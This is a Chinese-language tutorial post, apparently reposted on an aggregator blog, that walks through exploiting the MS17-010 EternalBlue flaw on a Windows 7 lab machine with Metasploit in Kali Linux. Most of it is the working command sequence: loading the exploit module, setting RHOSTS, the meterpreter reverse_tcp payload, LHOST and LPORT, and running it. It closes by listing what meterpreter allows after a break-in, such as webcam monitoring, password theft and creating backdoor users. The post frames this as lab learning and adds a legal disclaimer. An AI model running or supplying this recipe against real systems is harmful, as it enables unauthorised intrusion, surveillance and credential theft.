在Kali操作系统上使用metasploit
目錄
<一>:metasploit 簡述
<二>:msf 使用法則
<三>:啟動 metasploit 前需要做的事項
<四>:metasploit 攻擊 windows 系統
?????????metasploit 攻擊 eternalblue(永恒之藍)全流程:
??????????????? (1):使用模塊
??????????????? (2):配置模塊必選項
??????????????? (3):運行模塊
????????????? (4):設置必選項(補充)
<五>:meterpreter 攻擊成功后能做什么
<一>:metasploit 簡述
??????????????? metasploit 簡稱 msf,是一款開源安全漏洞利用和測試工具,集成了各種平臺上常見的溢出漏洞和流行的 shellcode,并持續保持更新。
<二>:msf 使用法則
??????????????? 使用模塊 ->配置模塊必選項->運行模塊
<三>:啟動 metasploit 前需要做的事項
??????????????? ①:打開Kali終端
??????????????? ②:使用sudo su 命令,并輸入 Kali 的密碼,切換至root用戶
??????????????? ③:使用 msfdb init 命令初始化 metasploit 數據庫(*可選)
<四>:metasploit 攻擊 windows 系統
??????????????? msfconsole:啟動 metasploit 命令行 (命令行效率高,方便使用)
?????????metasploit 攻擊 eternalblue(永恒之藍)全流程:
??????????????? (1):使用模塊
???????????????????????????????①:搜索微軟給永恒之藍的漏洞號:search ms17_010
?????????????????????????????? ②: 使用此漏洞:use exploit/windows/smb/ms17_010_eternalblue
??????????????? (2):配置模塊必選項
??????????????????????????????? 查看必選項[*required 為 yes 的就是必選項]
????????????????????????????????????????①:show options (查看設置)
????????????????(3):運行模塊
?????????????????????????????????? 以虛擬機上的xin7操作系統為靶機為例 (先同時按win+R,然后輸入cmd,回車,最后輸入ipconfig,查看被攻擊的靶機IP地址)
????????????????????????????????????????①:set RHosts 被攻擊的IP地址
????????????????????????????????????????②:show options (查看是否還有必選項需要修改)
????????????????????????????????????????③:set LPORT 0~65536 (為了防止攻擊失敗多設置一個)
????????????????????????????????????????④:run (攻擊操作系統,并獲取命令運行最低權限)
?
(注:顯示攻擊失敗表示目標主機上沒有此漏洞,此漏洞只適用于攻擊自己的win7靶機,高版本的系統已經修復此漏洞,顯示WIN 表示攻擊成功,其他則是失敗)
????????????? (4):設置必選項(補充)
???????????????????????????????????①: set RHosts 被攻擊的IP地址
??????????????????????????????????????? [*RHOSTS 為 target host(s)代表要攻擊誰]
?????????????????????????????????? ②: set Payload windows/x64/meterpreter/reverse_tcp
???????????????????????????????????????? [*Payload 是攻擊載荷,就是攻擊完成后想獲取的東西,這里是想獲取 meterpreter]
????????????????????????????????????????[*meterpreter 是metasploit 后滲透的神器 ]
???????????????????????????????? ③:set LHOST 攻擊的IP地址
??????????????????????????????????????? [*LHOST 為 listen host 代表你是誰]
??????????????????????????????? ④:set LPORT 攻擊方使用的監聽端口
??????????????????????????????????????? [* LPORT 為 listen port 代表要在攻擊方上開啟的端口,1~65535隨便選,但不能被占用]
??????????????????? (5):meterpreter 后輸入 help,可顯示攻擊成功后可用的權限
<五>:meterpreter 攻擊成功后能做什么
??????????????? meterpreter 是強大的后滲透模塊,可以輸入help 查看幫助信息,遠程控制、命令執行、攝像頭監控、密碼獲取、創建后門用戶、破壞篡改系統.......這些看起來非常復雜又高級的操作都能用meterpreter 中的一行或幾個字母,簡單的命令完成。
(注:此文章及操作流程只限于學習交流,請勿進行非法操作,做遵紀守法公民)
總結
以上是生活随笔為你收集整理的在Kali操作系统上使用metasploit的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 半导体显示丨三星显示器拟投资逾21.5亿
- 下一篇: java信息管理系统总结_java实现科